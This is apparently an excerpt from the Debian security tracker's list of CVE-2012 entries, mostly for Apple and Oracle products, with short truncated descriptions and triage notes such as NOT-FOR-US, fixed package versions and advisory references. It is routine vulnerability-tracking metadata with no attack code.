CVE-2012-0682 (WebKit, as used in Apple Safari before 6.0, allows remote attackers to ...)
	NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0681 (Apple Remote Desktop before 3.6.1 does not recognize the "Encrypt all ...)
	NOT-FOR-US: Apple Remote Desktop
CVE-2012-0680 (Apple Safari before 6.0 does not properly handle the autocomplete ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0679 (Apple Safari before 6.0 allows remote attackers to read arbitrary ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0678 (Cross-site scripting (XSS) vulnerability in Apple Safari before 6.0 ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0677 (Heap-based buffer overflow in Apple iTunes before 10.6.3 allows remote ...)
	NOT-FOR-US: Apple iTunes
CVE-2012-0676 (WebKit in Apple Safari before 5.1.7 does not properly track state ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0675 (Time Machine in Apple Mac OS X before 10.7.4 does not require ...)
	NOT-FOR-US: Time Machine
CVE-2012-0674 (Safari in Apple iOS before 5.1.1 allows remote attackers to spoof the ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0673 RESERVED
CVE-2012-0672 (WebKit in Apple iOS before 5.1.1 allows remote attackers to execute ...)
	NOTE: http://dl.packetstormsecurity.net/1205-advisories/APPLE-SA-2012-05-09-2.txt
CVE-2012-0671 (Apple QuickTime before 7.7.2 allows remote attackers to execute ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0670 (Integer overflow in Apple QuickTime before 7.7.2 allows remote ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0669 (Buffer overflow in Apple QuickTime before 7.7.2 on Windows allows ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0668 (Buffer overflow in Apple QuickTime before 7.7.2 allows remote ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0667 (Integer signedness error in Apple QuickTime before 7.7.2 on Windows ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0666 (Stack-based buffer overflow in the plugin in Apple QuickTime before ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0665 (Heap-based buffer overflow in Apple QuickTime before 7.7.2 allows ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0664 (Heap-based buffer overflow in Apple QuickTime before 7.7.2 on Windows ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0663 (Multiple stack-based buffer overflows in Apple QuickTime before 7.7.2 ...)
	NOT-FOR-US: Apple QuickTime
CVE-2012-0662 (Integer overflow in the Security Framework in Apple Mac OS X before ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0661 (Use-after-free vulnerability in QuickTime in Apple Mac OS X 10.7.x ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0660 (Buffer underflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0659 (Integer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0658 (Buffer overflow in QuickTime in Apple Mac OS X before 10.7.4 allows ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0657 (Quartz Composer in Apple Mac OS X before 10.7.4, when the RSS ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0656 (Race condition in LoginUIFramework in Apple Mac OS X 10.7.x before ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0655 (libsecurity in Apple Mac OS X before 10.7.4 does not properly restrict ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0654 (libsecurity in Apple Mac OS X before 10.7.4 accesses uninitialized ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0653 RESERVED
CVE-2012-0652 (Login Window in Apple Mac OS X 10.7.3, when Legacy File Vault or ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0651 (The directory server in Directory Service in Apple Mac OS X 10.6.8 ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0650 (Buffer overflow in the DirectoryService Proxy in DirectoryService in ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0649 (Race condition in the initialization routine in blued in Bluetooth in ...)
	NOT-FOR-US: Apple Mac OS X
CVE-2012-0648 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0647 (WebKit in Apple Safari before 5.1.4 does not properly handle redirects ...)
	NOT-FOR-US: Apple Safari/ if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0646 (Format string vulnerability in VPN in Apple iOS before 5.1 allows ...)
	NOT-FOR-US: VPN in Apple iOS
CVE-2012-0645 (Siri in Apple iOS before 5.1 does not properly restrict the ability of ...)
	NOT-FOR-US: Siri
CVE-2012-0644 (Race condition in the Passcode Lock feature in Apple iOS before 5.1 ...)
	NOT-FOR-US: Passcode Lock in Apple iOS
CVE-2012-0643 (The kernel in Apple iOS before 5.1 does not properly handle debug ...)
	NOT-FOR-US: kernel in Apple iOS
CVE-2012-0642 (Integer underflow in Apple iOS before 5.1 allows remote attackers to ...)
	NOT-FOR-US: Apple iOS
CVE-2012-0641 (CFNetwork in Apple iOS before 5.1 does not properly construct request ...)
	NOT-FOR-US: Apple iOS
CVE-2012-0640 (WebKit in Apple Safari before 5.1.4 does not properly implement "From ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0639 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0638 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0637 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0636 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0635 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0634 (WebKit, as used in Apple iTunes before 10.6, allows man-in-the-middle ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0633 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0632 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0631 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0630 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0629 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0628 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0627 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0626 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0625 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0624 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0623 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0622 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0621 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0620 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0619 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0618 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0617 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0616 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0615 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0614 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0613 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0612 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0611 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0610 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0609 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0608 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0607 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0606 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0605 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0604 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0603 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0602 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0601 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0600 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0599 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0598 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0597 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0596 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0595 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0594 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0593 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0592 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0591 (WebKit, as used in Apple iOS before 5.1 and iTunes before 10.6, allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0590 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0589 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0588 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0587 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0586 (Cross-site scripting (XSS) vulnerability in WebKit, as used in Apple ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0585 (The Private Browsing feature in Safari in Apple iOS before 5.1 allows ...)
	NOT-FOR-US: Apple Safari/iTunes if anything of this affects Chromium, the Chrome sec team will know and fix
CVE-2012-0584 (The Internationalized Domain Name (IDN) feature in Apple Safari before ...)
	NOT-FOR-US: Apple Safari
CVE-2012-0583 (Unspecified vulnerability in the MySQL Server component in Oracle ...)
	{DSA-2496-1}
	- mysql-5.1 5.1.62-1 (bug #670636)
	- mysql-5.5 5.5.23-1
CVE-2012-0582 (Unspecified vulnerability in the Siebel Clinical component in Oracle ...)
	NOT-FOR-US: Oracle Industry Applications
CVE-2012-0581 (Unspecified vulnerability in the Oracle Agile component in Oracle ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-0580 (Unspecified vulnerability in the Oracle Agile PLM for Process ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-0579 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0578 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1 (Only affects 5.5)
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-0577 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0576 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0575 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0574 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-0573 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0572 (Unspecified vulnerability in the Server component in Oracle MySQL ...)
	- mysql-5.1
	- mysql-5.5 5.5.29+dfsg-1
CVE-2012-0571 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0570 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, 10, and 11 ...)
	NOT-FOR-US: Solaris
CVE-2012-0569 (Unspecified vulnerability Oracle Sun Solaris 10 allows local users to ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-0568 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...)
	NOT-FOR-US: Solaris
CVE-2012-0567 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0566 (Unspecified vulnerability in the Oracle Agile component in Oracle ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-0565 (Unspecified vulnerability in the Oracle Agile component in Oracle ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-0564 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0563 (Unspecified vulnerability in Oracle Solaris 9, 10, and 11 allows local ...)
	NOT-FOR-US: Oracle Solaris
CVE-2012-0562 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0561 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0560 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0559 (Unspecified vulnerability in the PeopleSoft Enterprise SCM component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0558 (Unspecified vulnerability in the Primavera P6 Enterprise Project ...)
	NOT-FOR-US: Oracle Primavera Products Suite
CVE-2012-0557 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0556 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0555 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0554 (Unspecified vulnerability in the Oracle Outside In Technology ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0553 (Buffer overflow in yaSSL, as used in MySQL 5.1.x before 5.1.68 and ...)
	- mysql-5.1
	- mysql-5.5 5.5.28+dfsg-1
	- cyassl (bug #598391)
	- libyassl (bug #664533)
	NOTE: https://blogs.oracle.com/sunsecurity/entry/cve_2012_0553_buffer_overflow
CVE-2012-0552 (Unspecified vulnerability in the Oracle Spatial component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0551 (Unspecified vulnerability in the Java Runtime Environment (JRE) in ...)
	- glassfish (Debian only builds some core libs, not the full application stack)
	- openjdk-6 (specific to Oracle Java)
	- openjdk-7 (specific to Oracle Java)
CVE-2012-0550 (Unspecified vulnerability in the GlassFish Enterprise Server component ...)
	- glassfish (Debian only builds some core libs, not the full application stack)
CVE-2012-0549 (Unspecified vulnerability in the Oracle AutoVue Office component in ...)
	NOT-FOR-US: Oracle Supply Chain Products Suite
CVE-2012-0548 (Unspecified vulnerability in Oracle SPARC Enterprise M Series Servers ...)
	NOT-FOR-US: Oracle SPARC Enterprise M Series Servers XCP 1110
CVE-2012-0547 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-7 7u3-2.1.2-1 (low)
	- openjdk-6 6b24-1.11.4-1 (low)
CVE-2012-0546 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0545 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0544 (Unspecified vulnerability in the Oracle FLEXCUBE Universal Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0543 (Unspecified vulnerability in the BI Publisher (formerly XML Publisher) ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0542 (Unspecified vulnerability in the Oracle iStore component in Oracle ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-0541 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0540 (Unspecified vulnerability in Oracle MySQL Server 5.1.62 and earlier ...)
	{DSA-2496-1}
	- mysql-5.1 (bug #682212)
	- mysql-5.5 5.5.24+dfsg-1 (bug #682210)
CVE-2012-0539 (Unspecified vulnerability in Oracle Sun Solaris 8, 9, and 10 allows ...)
	NOT-FOR-US: Oracle Sun Solaris
CVE-2012-0538 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0537 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-0536 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0535 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-0534 (Unspecified vulnerability in the RDBMS Core component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0533 (Unspecified vulnerability in the PeopleSoft Enterprise FCSM component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0532 (Unspecified vulnerability in the Identity Manager component in Oracle ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0531 (Unspecified vulnerability in the PeopleSoft Enterprise Portal ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0530 (Unspecified vulnerability in the PeopleSoft Enterprise SCM component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0529 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0528 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0527 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0526 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0525 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0524 (Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0523 (Unspecified vulnerability in the Oracle Grid Engine component in ...)
	- gridengine 6.2u5-7.1
	NOTE: http://www.securityfocus.com/bid/53132
	NOTE: http://gridscheduler.sourceforge.net/security.html
CVE-2012-0522 (Unspecified vulnerability in the Oracle JDeveloper component in Oracle ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0521 (Unspecified vulnerability in the PeopleSoft Enterprise HCM component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0520 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0519 (Unspecified vulnerability in the Core RDBMS component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0518 (Unspecified vulnerability in the Oracle Application Server Single ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0517 (Unspecified vulnerability in the PeopleSoft Enterprise HRMS component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0516 (Unspecified vulnerability in the Oracle iPlanet Web Server component ...)
	NOT-FOR-US: Oracle Sun Products Suite
CVE-2012-0515 (Unspecified vulnerability in the Identity Manager Connector component ...)
	NOT-FOR-US: Oracle Fusion Middleware
CVE-2012-0514 (Unspecified vulnerability in the PeopleSoft Enterprise CRM component ...)
	NOT-FOR-US: Oracle PeopleSoft Products
CVE-2012-0513 (Unspecified vulnerability in the Oracle Application Object Library ...)
	NOT-FOR-US: Oracle E-Business Suite
CVE-2012-0512 (Unspecified vulnerability in the Enterprise Manager Base Platform ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0511 (Unspecified vulnerability in the OCI component in Oracle Database ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0510 (Unspecified vulnerability in the Core RDBMS component in Oracle ...)
	NOT-FOR-US: Oracle Database Server
CVE-2012-0509 (Unspecified vulnerability in the Oracle FLEXCUBE Direct Banking ...)
	NOT-FOR-US: Oracle Financial Services Software
CVE-2012-0508 (Unspecified vulnerability in the JavaFX component in Oracle Java SE ...)
	- openjdk-6 (JavaFX not part of OpenJDK)
	- openjdk-7 (JavaFX not part of OpenJDK)
	- sun-java6
	[squeeze] - sun-java6 (Non-free not supported)
CVE-2012-0507 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2420-1}
	- openjdk-6 6b24-1.11.1-1
	- openjdk-7 7~u3-2.1-1
	- sun-java6
	[squeeze] - sun-java6 (Non-free not supported)
	NOTE: Replacement for misused CVE-2011-3571.
CVE-2012-0506 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2420-1}
	- openjdk-6 6b24-1.11.1-1
	- openjdk-7 7~u3-2.1-1
	- sun-java6
	[squeeze] - sun-java6 (Non-free not supported)
CVE-2012-0505 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	{DSA-2420-1}
	- openjdk-6 6b24-1.11.1-1
	- openjdk-7 7~u3-2.1-1
CVE-2012-0504 (Unspecified vulnerability in the Java Runtime Environment (JRE) ...)
	- openjdk-6 (Only applies to the Windows-specific update tool)
	- openjdk-7 (Only applies to the Windows-specific update tool)
	- sun-java6 (Only applies to the Windows-speci